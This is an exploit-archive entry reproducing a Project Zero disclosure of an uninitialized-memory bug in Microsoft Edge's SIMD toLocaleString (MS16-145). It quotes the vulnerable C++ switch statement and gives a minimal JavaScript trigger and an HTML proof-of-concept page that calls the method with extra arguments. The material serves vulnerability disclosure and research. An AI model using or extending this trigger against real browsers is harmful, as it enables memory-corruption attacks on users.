Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145) Exploit

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=961
 
The following code occurs in JavascriptSIMDObject::ToLocaleString in JavascriptSimdObject.cpp:
 
        Var* newArgs = HeapNewArray(Var, numArgs);
        switch (numArgs)
        {
        case 1:
            break;
        case 2:
            newArgs[1] = args[1];
            break;
        case 3:
            newArgs[1] = args[1];
            newArgs[2] = args[2];
            break;
        default:
            Assert(UNREACHED);
        }
 
If the call has more than three arguments, it will fall through, leaving newArgs uninitialized. This will cause toLocaleString to be called on uninitialized memory, having a similar effect to type confusion (as integers in the memory can be confused for pointers and vice-versa). A minimal PoC is as follows, and a full PoC is attached:
 
    var v = SIMD.Int32x4(1, 2, 3, 4);
    v.toLocaleString(1, 2, 3, 4)
-->
 
<html><body><script>
    try{
    var v = SIMD.Int32x4(1, 2, 3, 4);
    alert(v.toLocaleString(1, 2, 3, 4, 5, 6, 7));
    }catch(e){
    alert(e.message);
 
}
</script></body></html>

#  0day.today [2018-04-01]  #